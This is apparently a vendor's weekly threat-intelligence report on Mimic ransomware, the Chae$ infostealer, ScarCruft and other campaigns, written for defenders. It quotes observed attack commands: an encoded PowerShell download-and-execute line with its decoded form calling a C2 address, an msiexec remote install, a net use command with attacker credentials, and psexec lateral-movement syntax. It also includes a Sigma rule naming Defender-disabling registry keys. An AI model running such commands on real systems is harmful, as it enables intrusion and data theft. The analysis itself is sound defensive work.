Self Assessment

Weekly Intelligence Report – 26 Jan 2024

Published On : 2024-01-26
Share :
Weekly Intelligence Report – 26 Jan 2024

Ransomware of the Week

CYFIRMA Research and Advisory Team would like to highlight ransomware trends and insights gathered while monitoring various forums. This includes multiple – industries, geography, and technology – which could be relevant to your organization.

Type: Ransomware
Target Technologies: MS Windows

CYFIRMA Research and Advisory Team has found MIMIC ransomware in the wild while monitoring various underground forums as part of our Threat Discovery Process.

MIMIC Ransomware
Mimic ransomware appeared in mid-2022, seen targeting Russian and English-speaking regions. Some of the code in Mimic shares similarities with Conti ransomware.

Mimic is delivered as an executable, deploying various binaries alongside a disguised password-protected archive named Everything64.dll. Upon extraction, this archive reveals the actual ransomware payload. Additionally, Mimic incorporates tools designed to disable Windows Defender and utilizes authentic sdel binaries as part of its malicious arsenal.

When executed, the program will initially deposit its components into the %Temp%/7zipSfx folder. Subsequently, it will utilize the dropped 7za.exe to extract the password protected Everything64.dll to the same directory using a specific command.

Furthermore, it deposits a session key file, named session.tmp, into the same directory. This file serves the purpose of ensuring the encryption process can resume seamlessly in case of any interruptions.

Subsequently, the ransomware proceeds to duplicate the dropped files into “%LocalAppData%\{Random GUID}\”. Following this step, the ransomware undergoes a renaming process to “bestplacetolive.exe,” and the original files are removed from the %Temp% directory.

The ransomware supports other command line arguments as shown below,

Source: Surface web

Mimic ransomware is comprised of several threads, utilizing the CreateThread function to enhance encryption speed and make analysis more complex.

Upon execution, the ransomware initially establishes a hotkey (Ctrl + F1) using the RegisterHotKey API, enabling the display of status logs detailing the ongoing activities performed by the ransomware.

The ransomware’s config is located at its overlay and is decrypted using the NOT Operation.

Mimic ransomware config details (Source: Surface Web)

The ransomware comes with a wide range of capabilities, which include:

  • Collecting system information
  • Creating persistence via the RUN key
  • Bypassing User Account Control (UAC)
  • Disabling Windows Defender
  • Disabling Windows telemetry
  • Activating anti-shutdown measures
  • Activating anti-kill measures
  • Unmounting Virtual Drives
  • Terminating processes and services
  • Disabling sleep mode and shutdown of the system
  • Removing indicators
  • Inhibiting System Recovery

The ransomware leverages Everything32.dll, a legitimate Windows filename search engine known for providing real-time results for queries, in its operations. The ransomware exploits this tool, by utilizing Everything’s APIs to query specific file extensions and filenames, retrieving the file paths for subsequent encryption.

It uses the Everything_SetSearchW function to search for files to be encrypted or avoided using the following search format:

file:<ext:{list of extension}>file:wholefilename

It then appends the .QUIETPLACE file extension to the encrypted files.

Screenshot of files encrypted by Mimic ransomware (Source: Surface Web) Recent attack breakdown that involving mimic ransomware:
The Research team has found an active threat campaign named RE#TURGENCE. In this campaign, attackers focus on exploiting MSSQL database servers to get into systems. They appear to target countries in the US, EU, and LATAM regions, driven by financial motives.

The observed threat campaign typically concludes in two ways. Either the attackers sell “access” to the compromised server or they eventually deliver ransomware. The entire sequence of events takes around a month, starting from gaining initial access to the deployment of MIMIC ransomware on the victim’s domain.

The threat actors successfully employed brute force techniques to gain unauthorized access to the victim server. They utilized the xp_cmdshell procedure to execute commands on the compromised host.

After successfully executing code through the xp_cmdshell procedure, the attackers proceeded to run the following command on the server from the sqlservr.exe process: “C:\Windows\system32\cmd.exe” /c cmd /c powershell -exec bypass -w 1 -e aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4A ZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAH QAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA4ADgALgAyADEANAAuADIANgAuA DMAOgAyADUAOAAyADMALwAxADgAOQBKAHQAJwApACkA

This command initiated the execution of cmd.exe twice, enabling the execution of a PowerShell encoded command. Upon decoding, the command revealed:
iex((New-Object System.Net.Webclient).DownloadString(‘hxxp://88.214.26[.]3:25823/189Jt’))

The given command fetches a file named “189Jt” from a distant server and runs its enclosed code using PowerShell. In simple terms, any PowerShell instructions inside the file will be fetched and promptly executed.

The PowerShell script is semi-obfuscated, and most of the code seems to be overlooked. It seems to grab and execute the next part located at the conclusion of the initial script.

The subsequent PowerShell script, available at ‘hxxp://88.214.26[.]3:25823/MSjku,’ is retrieved and run in a similar fashion. This script holds a strongly obfuscated Cobalt Strike payload that is injected into the ongoing process using in-memory reflection techniques, particularly leveraging PowerShell in this instance. The script exhibits extensive obfuscation, particularly in the DLL imports and the Cobalt Strike payload, featuring numerous lines of intertwined variables and seemingly irrelevant comment blocks.

As per the configuration, the Cobalt Strike beacon is set to inject itself into the native Windows process, SndVol.exe. This particular process manages system volume controls and settings.

Using Cobalt Strike for code execution, the attackers opted for a more hands-on approach. They obtained AnyDesk binaries from a shared network drive they established, employing the command:

“c:\windows\system32\cmd.exe” /c net use f: /delete /y & net use f: \\45.148.121[.]87\f/user:grogu aqu!8171881cerq

Once linked as the “F:” drive, the attackers transferred the AnyDesk installer to C:\ad.exe, alongside the file ad.bat. The role of ad.bat is straightforward – it installs the AnyDesk connector service, creates a new local user, and adds that user to the administrators group.

In the ad.bat file, the creation of a local user named “windows” with the password “denek1010” is seen. This user is added to both the “administrators” group in English and, if present, the “administradores” group in LATAM. This suggests that the script was designed with a broad target range in mind.

Furthermore, the script installs the AnyDesk service using the command “c:\ad.exe –install c:\”program files (x86)”\ –silent”. It then halts and restarts the service, concluding by displaying the AnyConnect client ID.

Subsequently, the threat actors exclusively transitioned to using AnyConnect, moving away from Cobalt Strike.
Researchers noted that the threat actors used AnyDesk to download Mimikatz into the directory “c:\users\windows\desktop\x64\”. Additionally, they retrieved a batch script to streamline certain Mimikatz commands.
The script carries out various functions. Initially, it employs a recognized registry adjustment to activate clear text credentials. Afterward, it swiftly checks if the input is in Base64 format by inspecting the existence of the “C:\Program Files (x86)” directory. Depending on the result, it runs Mimikatz from the appropriate subdirectory (x86 or x64). The output of the Mimikatz dump is then stored in the Mimikatz_dump.txt file.

The threat actors opted to familiarize themselves with the network and domain. They acquired the Advanced Port Scanner utility through AnyDesk, saving it as c:\users\windows\documents\advport.exe.

Researchers observed the following activities from the Advanced Port Scanner utility:

  • Check domain controller remote shares (from UI of Advanced Port Scanner)
  • Get the hostname of a Hyper-V VM host using reg query “HKLM\Software\Microsoft\Virtual Machine\guest\parameters“
  • Test psexec.exe connection to DC (result fail)
  • Run psexec.exe on DC using extracted DA passwords(Mimikatz on MSSQL)
  • Test for the usage of RDP connecting to DC using dumped creds from Advanced Port Scanner UI (mstsc /v: [IP_REDACTED])
  • Check for remote shares on jumphosts (from UI of Advanced Port Scanner)
  • Test for and use RDP connecting to decoy host from Advanced Port Scanner UI

(mstsc /v: [IP_REDACTED])

After a few days, the attackers successfully extended their reach to two additional machines on the network, likely leveraging information gathered through Mimikatz and the Advanced Port Scanner utility.

To facilitate lateral movement, the attackers employed psexec, a utility commonly used by both threat actors and red teamers. They utilized this tool to establish a new session on a domain controller using domain admin credentials acquired earlier. The compromised MSSQL server received the following command to initiate lateral movement: c:\psexec.exe -u [REDACTED_DOMAIN]\[REDACTED_USER] -p [REDACTED_PASS]\\[REDACTED_IP] cmd.exe

With the domain admin privileges at their disposal, the threat actors were then able to navigate to other machines within the domain.

After several attempts at lateral movement using psexec, the threat actors seemed to reach a tipping point and decided to proceed with the ransomware attack.

The ransomware payload was acquired via AnyDesk and saved as red25.exe in the directory c:\Users\windows\Documents\. This payload, acting as a self-extracting archive, unpacks and executes red.exe, serving as the final ransomware payload.

The ransomware Mimic utilises the legitimate application Everything by VoidTools to identify and locate files for encryption. Mimic drops the necessary Everything binaries to facilitate the encryption process. In this case, the Mimic dropper, named “red25.exe,” deposited all essential files for the primary ransomware payload to achieve its objectives. These files include:

  • c:\users\windows\appdata\local\temp\7zipsfx.000\global_options.ini
  • c:\users\windows\appdata\local\temp\7zipsfx.000\everything2.ini
  • c:\users\windows\appdata\local\temp\7zipsfx.000\everything.ini
  • c:\users\windows\appdata\local\temp\7zipsfx.000\everything64.dll
  • c:\users\windows\appdata\local\temp\7zipsfx.000\everything32.dll
  • c:\users\windows\appdata\local\temp\7zipsfx.000\everything.exe
  • c:\users\windows\appdata\local\temp\7zipsfx.000\7za.exe

The main Mimic ransomware payload is able to take a few arguments. In the case of the RE#TURGENCE campaign, researchers observed it executing as:

  • “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e ul2
  • “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e ul1
  • “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e watch -pid 4164 -!

Following the completion of the encryption process, the red.exe process triggered the display of the ransom notice, saved as “—IMPORTANT—NOTICE—.txt” on the victim’s C:\ drive.

Mimic ransom note (Source: Surface Web)

Relevancy & Insights:

  • This ransomware specifically targets the widely used Windows Operating System, which is prevalent across numerous industries and organizations.
  • The ransomware modifies the HKLM\System\CurrentControlSet\services\VSS\Start registry key, setting the dword value to 0x00000004, effectively disabling the Volume Shadow Copy Service (VSS). This alteration hampers data backup and recovery, increasing the impact of potential data loss and hindering restoration efforts.
  • The Ransomware places itself in “HKEY_LOCAL_MACHINE\ SOFTWARE \Microsoft\Windows NT\CurrentVersion\Image File Execution Options\” to manipulate the execution behaviour of the image. This registry key allows the ransomware to achieve persistence, silently execute alongside or instead of legitimate images, and maintain control over compromised systems, evading detection.
  • Detect-Debug-Environment: Debugging environments are used by developers to analyze and troubleshoot software. This technique is used by the ransomware to determine whether it is operating in a debug environment. This feature aids the ransomware in avoiding analysis and detection attempts.
  • The ransomware exhibits long sleep behaviour in its execution to evade detection by security tools that flag suspicious activities. Additionally, it checks user input, analyzing actions or keyboard entries, these are the tactics to avoid detection.

Following are the TTPs based on the MITRE Attack Framework.

Sr. No Tactics Techniques/Sub- Techniques
1 TA0001:Initial Access T1091: Replication Through Removable Media
2 TA0002:Execution T1047: Windows Management Instrumentation
T1059.001: Command and Scripting Interpreter: PowerShell
T1129: Shared Modules
3 TA0003: Persistence T1543.003: Create or Modify System Process: Windows Service
T1546.012:Event Triggered Execution: Image File Execution Options Injection
T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1547.008: Boot or Logon Autostart Execution: LSASS Driver
T1574.002: Hijack Execution Flow: DLL Side- Loading
4 TA0004:Privilege Escalation T1055: Process Injection
T1543.003: Create or Modify System Process: Windows Service
T1546.012:Event Triggered Execution: Image File Execution Options Injection
T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1547.008: Boot or Logon Autostart Execution: LSASS Driver
T1574.002: Hijack Execution Flow: DLL Side- Loading
5 TA0005:Defense Evasion T1027: Obfuscated Files or Information
T1027.002: Obfuscated Files or Information: Software Packing
T1055: Process Injection
T1070.004: Indicator Removal: File Deletion
T1222: File and Directory Permissions Modification
T1497:Virtualization/Sandbox Evasion
T1562.001: Impair Defenses: Disable or Modify Tools
T1574.002: Hijack Execution Flow: DLL Side- Loading
6 TA0006: Credential Access T1056.001: Input Capture: Keylogging
7 TA0007:Discovery T1010:Application Window Discovery
T1012: Query Registry
T1033: System Owner/User Discovery
T1057: Process Discovery
T1082: System Information Discovery
T1083: File and Directory Discovery
T1120: Peripheral Device Discovery
T1135: Network Share Discovery
T1497:Virtualization/Sandbox Evasion
T1518.001: Software Discovery: Security Software Discovery
T1614.001: System Location Discovery: System Language Discovery
8 TA0008: Lateral Movement T1091: Replication Through Removable Media
9 TA0009: Collection T1056.001: Input Capture; Keylogging
10 TA0011: Command and Control T1071: Application Layer Protocol
T1573: Encrypted Channel
11 TA0040:Impact T1486: Data Encrypted for Impact

ETLM Assessment:
CYFIRMA’s assessment, relying on the available information about the Mimic ransomware, suggests that the threat is poised to evolve further in sophistication. Future iterations are likely to incorporate advanced evasion tactics, heightened focus on specific sectors and regions, and potentially more intricate methods for disseminating exfiltrated data. Moreover, the ransomware’s persistence mechanisms and anti-detection measures are anticipated to undergo further refinement, presenting continuous challenges for organizations. Organizations should prioritize robust cybersecurity measures and remain vigilant against emerging variants.

Sigma Rule
title: Disable Windows Defender Functionalities Via Registry Keys tags:
– attack.defense_evasion
– attack.t1562.001 logsource:
product: windows category: registry_set
detection: selection_main:
– ‘\SOFTWARE\Microsoft\Windows Defender\’
– ‘\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\’
– ‘\SOFTWARE\Policies\Microsoft\Windows Defender\’ selection_dword_1:
– ‘\DisableAntiSpyware’
– ‘\DisableAntiVirus’
– ‘\Real-Time Protection\DisableBehaviorMonitoring’
– ‘\Real-Time Protection\DisableIntrusionPreventionSystem’
– ‘\Real-Time Protection\DisableIOAVProtection’
– ‘\Real-Time Protection\DisableOnAccessProtection’
– ‘\Real-Time Protection\DisableRealtimeMonitoring’
– ‘\Real-Time Protection\DisableScanOnRealtimeEnable’
– ‘\Real-Time Protection\DisableScriptScanning’
– ‘\Reporting\DisableEnhancedNotifications’
– ‘\SpyNet\DisableBlockAtFirstSeen’ Details: ‘DWORD (0x00000001)’
selection_dword_0: TargetObject|endswith:
– ‘\App and Browser protection\DisallowExploitProtectionOverride’
– ‘\Features\TamperProtection’
– ‘\MpEngine\MpEnablePus’
– ‘\PUAProtection’
– ‘\Signature Update\ForceUpdateFromMU’
– ‘\SpyNet\SpynetReporting’
– ‘\SpyNet\SubmitSamplesConsent’
– ‘\Windows Defender Exploit Guard\Controlled Folder Access\EnableControlledFolderAccess’
Details: ‘DWORD (0x00000000)’
condition: selection_main and 1 of selection_dword_* falsepositives:
– Administrator actions via the Windows Defender interface level: high
(Source: Surface web)


  • Implement competent security protocols and encryption, authentication, or access credentials configurations to access critical systems in your cloud and local environments.
  • Ensure that backups of critical systems are maintained which can be used to restore data in case a need arises.


  • A data breach prevention plan must be developed considering, (a) the type of data being managed by the company; (b) the remediation process; (c) where and how the data is stored; (d) if there is an obligation to notify the local authority.
  • Enable zero-trust architecture and multifactor authentication (MFA) to mitigate the compromise of credentials.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.


  • Update all applications/software regularly with the latest versions and security patches alike.
  • Add the Sigma rules for threat detection and monitoring which will help to detect anomalies in log events, identify and monitor suspicious activities.

Trending Malware of the Week

Type: Infostealer
Objective: Credential Stealing, Financial theft
Target Technologies: WhatsApp, AWS, WordPress, Browsers

Active Malware of the Week
This week “Chae$” is trending.

Chae$ is a malicious program designed for information theft, focusing on acquiring log-in credentials, credit card details, and other sensitive financial information as its primary functionalities. Researchers recently found Chae$ 4.1, the latest update in the Chae$ malware Infostealer series, as part of their ongoing efforts to monitor and analyze emerging cyber threats. The update includes enhancements to the Chronod module and introduces a unique aspect to its features.

Fig: Infection Chain

Attack Method
The infection chain initiates with a Portuguese email posing as an urgent communication request from a lawyer related to a legal case. The email pressures the recipient with a call for an immediate response, warning of severe legal consequences. It contains a link and a password to access a document from the provided link.

When the victim clicks the given link, they are redirected to https[:]//totalavprotection[.]shop/abrirProcesso[.]php?email=<victims_email>. Subsequently, they are asked to enter the provided password to download a document, presented as a ZIP file. Notably, the website https[:]//totalavprotection[.]shop serves a dual purpose, functioning deceptively as a TotalAV website, and it can directly deliver the MSI installer without the intermediate step of a ZIP

Deceptive Websites and Malicious Payloads
Another malicious website, https[:]//www.webcamcheck[.]online/, delivers the harmful payload directly as an MSI installer. The site claims to scan the user’s machine for risks, recommending a driver update after the supposed scan. When the victim clicks the red BLOCK button, a background JavaScript is executed. This script imitates a legitimate system scan by displaying a hardcoded list of files, creating the illusion of a thorough analysis of the victim’s computer.

After the simulated scan, the victim is presented with a deceptive message claiming “Security Risk Detected.” The message urges the victim to download an updated driver, purportedly to install the latest version and eliminate the identified risk.

Clicking the button initiates the execution of a script called download.js, which aims to clandestinely introduce the malicious installer by decoding a zipped base64 blob.

Additionally, the threat actor implants PHP Webshells on compromised WordPress sites. These open-source tools facilitate remote management for web administrators without relying on cPanel. Researchers believe the threat actor employs these Webshells to deploy the malicious payload on WordPress websites, exemplified by the URL https[:]//chpost[.]eu[.]org/wp-content/

Downloaded ZIP and LNK File
The downloaded ZIP archive includes an LNK file named “Visualizar” (translated to “Visualize” in Portuguese), aligning with the content of the deceptive email.

Inside the ZIP archive is an LNK file. Clicking on this file triggers the execution of msiexec.exe, enabling the remote download and silent execution of the subsequent stage payload without a user interface, using the following command:

• %systemroot%\system32\msiexec.exe /i http[:]//54[.]207[.]253[.]173/DjXR/187/ogohude[.]msi /qn[.]

The payload is served by the C2 server upon receiving a request triggered by msiexec, formatted as <C2 address>/*/*/*.msi. The server checks the User-Agent to ensure it equals Windows Installer, automatically added when msiexec requests the payload. Any alternative User-Agent value results in a different outcome.

MSI Installer and Framework Evolution
The MSI installer, whether obtained directly from the deceptive website or through the ZIP→LNK infection chain, performs identical operations. The key distinction lies in their size, with the version from the website being around ~100MB, while the LNK infection chain reduces the size to just ~100KB by removing padding from the JS script within the MSI. Subsequently, the attack chain follows a similar pattern to previous variants, with some adjustments in the Chae$ framework, advancing from version 4 to 4.1, notably characterized by modifications in the Chronod module.

Chronod module
In earlier versions of Chae$, researchers identified the Chronod module as a critical component responsible for intercepting browser activity and extracting information such as login credentials and banking details. It has a clipping functionality, extending over 2,000 lines of code,and was tailored to target specific services like WhatsApp, AWS, WordPress, and more. However, in the latest iteration, Chae$ 4.1, the development team took a strategic shift. They revamped the Chronod module, adopting a more generic and modular approach. Instead of a single class managing all functionalities, they compartmentalized the logic into multiple classes, marking a significant evolution in the malware’s design.

The snippet of code provided shows a portion of the main class within the Chronod module, inheriting from ChronodInternal, which utilizes Google’s DevTools for managing callbacks and establishing communication with Chromium-based browsers. Among the browser hook callbacks integrated into this class are:

  • hook_obta: This function adds JavaScript scripts to be evaluated upon new document creation. It includes a script that overrides the webdriver property in the browser’s navigator object. Additionally, it optionally adds an ASCII art banner if debug_mode is enabled.
  • hook_obclo: This function is attached to the browser close event.
  • hook_obmsg: Attached to browser messages, this hook manages messages related to network requests, specifically those tied to Network.requestWillBeSent. It examines all POST requests made by a browser and checks whether the request’s POST data aligns with a generic credit card or generic login attempt. The evaluation involves checking for the presence of fields related to login attempts (such as user, password, etc.) or credit card information (including card, cc, cvv, etc.).

C2 Infrastructure and Team Panel
The Chae$ team utilizes the hooking infrastructure to inject a JavaScript script responsible for replacing the QR Code in PIX transactions. Additionally, they have incorporated “eco- friendly” ASCII art displayed during debug mode. Stolen data, often accompanied by a screenshot capturing the victim’s machine state at the time of theft, is transmitted to the C2 using the TsApi class. This class serves as a client, managing C2 communication and request encryption/decryption. Similar to previous versions, the class dynamically retrieves its C2 by sending a DNS TXT record to

The analysis of C2s used across different phases of the framework reveals the existence of the Chae$ team panel login page.

Fig: Login Page of chae$ team


  • The Chae$ malware, initially discovered in November 2020, has been subject to ongoing evolution. Researchers examined subsequent variants in January 2022, and the malware actors were identified as ‘Lucifer’. Notably, in December 2022, Chae$ underwent further evolution by incorporating WMI for system data collection. This signifies the ongoing development and adaptation of the Chae$ malware to persist in its malicious activities.
  • The Chae$ team made a notable update to the new variant (Chae$ 4.1), which is the QR code parsing class, by incorporating opencv-python for this purpose. Additionally, within the same class, they introduced a function called “greetings” that includes a message specifically directed at security researchers, appreciating their latest research findings.
  • This type of malware represents a multifaceted threat with a primary focus on targeting financial data, either by compromising individual bank accounts or exploiting vulnerabilities in platforms that store such sensitive information. What makes this malware particularly concerning is its versatility, as it can exhibit a wide range of dangerous functionalities. These functions may vary and can be combined in different ways, highlighting the adaptability and dynamic nature of modern malicious software. This adaptability allows the malware to pose threats beyond financial breaches, making it a complex and evolving challenge for cybersecurity professionals to combat effectively.

From the ETLM perspective, CYFIRMA anticipates that the evolution of the Chae$ 4.1 malware and its intricate attack chain underscores the growing sophistication and adaptability of cyber threats. Looking ahead, it is likely that malware will continue to diversify its functionalities, posing increasingly complex challenges for cybersecurity professionals. Organizations should anticipate a broader range of targeted attacks, not only on financial data but also on sensitive information across various sectors. The modular and generic design of malware, as seen in the Chronod module, suggests a future where attackers can easily customize and deploy tailored threats. The impact on organizations is expected to intensify, with a heightened need for robust cybersecurity measures, employee awareness, and proactive defense strategies to mitigate evolving threats effectively. As malware becomes more dynamic, organizations must prioritize continuous adaptation and innovation in their security frameworks to safeguard against emerging risks.

Kindly refer to the IOCs Section to exercise controls on your security systems.


  • Create a strategy of layering security controls in the organization to make it difficult for adversaries to carry out reconnaissance, exploiting a weakness in the system and potential exfiltration of data.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Configure organization’s intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on — and upon review, consider blocking connection attempts to and from — the external IP addresses and domains listed in the appendix.


  • Implement real-time website monitoring to analyse network traffic going in and out of the website to detect malicious behaviours.
  • Move beyond the traditional model of security awareness towards Improved Simulation and training exercises that mimic real attack scenarios, account for behaviors that lead to a compromise, and are measured against real attacks the organization receives.
  • Security Awareness training should be mandated for all company employees. The training should ensure that employees:
  • Avoid downloading and executing files from unverified sources.
  • Inspect file extensions. Do not trust the filetype logo alone. An executable file can be disguised as a PDF or office document.


  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Use multi-factor authentication (MFA) to mitigate credential theft and prevent attacker access. Keep MFA always-on for privileged accounts and apply risk-based MFA for normal accounts.
  • Anti-evasion technology that prevents advanced evasion techniques that use embedded files and malicious URLs.

Weekly Intelligence Trends/Advisory

Weekly Attack Type and Trends

Key Intelligence Signals:

  • Attack Type: Malware Implant, Spear phishing, Ransomware Attacks, Vulnerabilities & Exploits, Data Leaks.
  • Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gains, Espionage.
  • Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption.
  • Ransomware –INCRansom Ransomware | Malware – Chae$
  • INCRansom Ransomware – One of the ransomware groups.
  • Please refer to the trending malware advisory for details on the following:
  • Malware – Chae$
  • Behaviour –Most of these malwares use phishing and social engineering techniques as their initial attack vectors. Apart from these techniques, exploitation of vulnerabilities, defence evasion, and persistence tactics are being observed.

Threat Actor in Focus

ScarCruft: A Deep Dive into Ongoing North Korean APT Operations Targeting Experts and Media Organizations

  • Threat Actors: ScarCruft
  • Attack Type: Spear phishing
  • Objective: Espionage
  • Target Technology: Windows
  • Target Geographies: South Korean
  • Target Industries: Media & IT Industries
  • Business Impact: Data Loss, Data exfiltration

In a recent observation, researchers disclosed a sophisticated and persistent
campaign led by the suspected North Korean APT group; ScarCruft. The focus of the campaign was on targeting high-profile individuals within the media and experts specializing in North Korean affairs, particularly from South Korea’s academic sector. The discovered malware, believed to be in the planning and testing phases, underscores ScarCruft’s commitment to advancing its arsenal for future campaigns. Notably, ScarCruft demonstrated a shift in tactics by experimenting with new infection chains, incorporating a technical threat research report on Kimsuky as a decoy document. This strategic move suggests a deliberate effort to target consumers of threat intelligence, including cybersecurity professionals and threat researchers. The use of phishing emails, particularly one impersonating a member of the North Korea Research Institute, highlighted the group’s adeptness at social engineering tactics.

Researcher revealed a phishing campaign impersonating a member of the North Korea Research Institute, sent from “kirnchi122[@]hanmail[.]net” on December 13, 2023. The email contained an attached archive file named “December 13th,” presenting itself as presentation materials from a fabricated human rights expert discussion meeting. To enhance credibility, the email asserted the meeting occurred on the same date. Among the nine files in the archive, two were malicious LNK files disguised as Hanword documents, utilizing the Hangul Word Processor icon. These LNK files, exceeding 48 MB, executed a multi-stage mechanism deploying the RokRAT backdoor, emphasizing the should be evolving tactics of threat actors.

In a separate discovery, researchers identified ScarCruft’s testing grounds, unveiling malware in development, including shellcode variants and oversized LNK files named “intelligence.lnk” and “news.lnk.” The latter, potentially a fully developed version of the former, demonstrated ScarCruft’s intention to expand its target list and masquerade as cybersecurity professionals.

The findings emphasize ScarCruft’s persistent dedication to gathering strategic intelligence through targeted attacks, demonstrating an evolving and adaptive threat landscape. Researchers remains vigilant in tracking ScarCruft activities and supporting organizations and individuals at risk of being targeted by this sophisticated North Korean APT group.

Relevancy & Insights:
ScarCruft, an active North Korean advanced persistent threat since 2016 (also known as APT37 and InkySquid), has recently shown parallels with another suspected North Korean threat group in terms of infrastructure and command-and-control server configurations. These shared operational characteristics suggest a potential collaboration or shared objectives. The discovery underscores the importance of ongoing monitoring and analysis to grasp the dynamics within the North Korean cyber threat landscape, providing valuable insights for cybersecurity efforts.

ETLM Assessment:
North Korean Advanced Persistent Threats (APTs) maintain a consistent focus on South Korea, driven by geopolitical motives for intelligence gathering. Notably, ScarCruft has employed a unique tactic, using a research paper on APT Kimsuky as a decoy within their social engineering strategy. This presents an intriguing development, suggesting the possibility of future innovative social engineering techniques by North Korean threat actors, particularly targeting South Korean IT companies due to geopolitical considerations. Emphasizing the significance of vigilant External Threat Landscape Management, highlights the necessity to defend against evolving cyber threats and potential collaborative endeavours from these sophisticated actors.


  • Strengthen phishing detection mechanisms to identify and block sophisticated spear phishing attempts, considering the evolving tactics of threat actors like ScarCruft.
  • Conduct regular training sessions for employees to enhance their awareness of evolving cyber threats, particularly emphasizing the dangers associated with phishing and social engineering tactics.
  • Ensure comprehensive endpoint security solutions are in place, regularly updated, and capable of detecting and preventing the installation of custom malware such as the RokRAT backdoor.
  • Conduct regular security audits and assessments to identify and address vulnerabilities in the infrastructure, with a focus on the specific techniques employed by ScarCruft.
  • Develop and implement proactive threat hunting strategies to identify and neutralize potential threats before they escalate, leveraging intelligence gathered from previous ScarCruft campaigns.

Indicators of Compromise
Kindly refer to the IOCs (Indicators of Compromise) Section to exercise controls on your security systems

Major Geopolitical Developments in Cybersecurity

Iranian hackers targeting universities and research organizations
Researchers have observed the Iranian threat actor; Charming Kitten (also known as Mint Sandstorm), targeting high-profile individuals working on Middle Eastern affairs at universities and research organizations. The targeted countries include France, Belgium, Israel, the United Kingdom and the United States and the campaign has been ongoing at least since November of the last year. The threat actor is using phishing emails to deliver malicious files, including a new, custom backdoor.

ETLM Assessment:
It is well known that this group engages in resource-intensive social engineering efforts aimed at academics, researchers, journalists, and other people who may have perspectives or insights into security and policy matters of importance to Tehran. These individuals are attractive targets for intelligence gathering for the Iranian regime, as are perceived to be close to policy making circles and are thus in position to influence the intelligence and policy communities. This campaign should be regarded as a classic case of state-driven espionage with many similar ones possibly underway.

Rise in Malware/Ransomware and Phishing

The INCRansom Ransomware impacts Sykes Consulting

  • Attack Type: Ransomware
  • Target Industry: Construction
  • Target Geography: The United States of America
  • Ransomware: INCRansom Ransomware
  • Objective: Data Theft, Data Encryption, Financial Gains
  • Business Impact: Financial Loss, Data Loss, Reputational Damage

From the External Threat Landscape Management (ETLM) Perspective, CYFIRMA observed in an underground forum that a company from the United States of America; (www[.]sykes-consulting[.]com), was compromised by INCRansom Ransomware. Sykes Consulting provides structural engineering consulting for public and private sector markets locally, nationally, and internationally. The firm specializes in the design of varied building types, including museums, sports facilities, higher education, k-12, aviation, parking, healthcare, office, and retail. The compromised data includes confidential and sensitive information belonging to the organization.

The following screenshot was observed published on the dark web:

Source: Dark Web

Relevancy & Insights:

  • The INCRansom ransomware is an extortion operation that surfaced in July 2023. It operates as a multi-extortion scheme, wherein it unlawfully acquires victim data and subsequently threatens to disclose this information online, unless the victim complies with their demands.
  • INCRansom Ransomware primarily targets countries such as the United States of America, Australia, Germany, the United Kingdom, and the Philippines.
  • The INCRansom Ransomware primarily targets industries including Specialized Heavy Construction, Specialized Consumer Services, Computer Services, Aerospace and Government Agencies.
  • Based on the INCRansom Ransomware victims list from 1 Jan 2023 to 24 Jan 2024, the top 5 Target Countries are as follows:
  • The Top 10 Industries, most affected by INCRansom Ransomware from 1 Jan 2023 to 24 Jan 2024 are as follows:

ETLM Assessment:
CYFIRMA’s assessment highlights a consistent targeting of US-based companies by the INCRansom Ransomware, as depicted in the attached graph. However, recent incidents, such as the Sykes Consulting attack, emphasize the potential vulnerability of other prominent construction entities to similar targeting. It is clear that the threat landscape is dynamic, necessitating continued vigilance among organizations across various sectors to effectively mitigate risks associated with ransomware attacks.

Vulnerabilities and Exploits

Vulnerability in Access analysis CGI An-Analyzer

  • Attack Type: Vulnerabilities & Exploits
  • Target Technology: Modules and components for CMS
  • Vulnerability: CVE-2024-22113 (CVSS Base Score 4.7)
  • Vulnerability Type: URL Redirection to Untrusted Site (‘Open Redirect’)
  • Patch: Not available

The vulnerability allows a remote attacker to redirect victims to an arbitrary URL

Relevancy & Insights:
The vulnerability exists due to improper sanitization of user-supplied data. A remote attacker can create a link that leads to a trusted website, however, when clicked, redirects the victim to an arbitrary domain.

Successful exploitation of this vulnerability may allow a remote attacker to perform a phishing attack and steal potentially sensitive information.

Affected Products: https[:]//jvn[.]jp/en/jp/JVN73587943/

Monitoring and Detection: Implement monitoring and detection mechanisms to identify unusual system behavior that might indicate an attempted exploitation of this vulnerability.

This week, CYFIRMA researchers have observed significant impacts on various products, due to a range of vulnerabilities. The following are the top 5 most affected products.

Latest Cyber-Attacks, Incidents, and Breaches


  • Threat Actors: BLACK BASTA
  • Attack Type: Ransomware
  • Objective: Data Leak, Financial Gains
  • Target Technology: Web Application
  • Target Geographies: UK
  • Target Industry: Critical Infrastructure
  • Business Impact: Operational Disruption, Data Loss, Financial Loss, Potential Reputational Damage

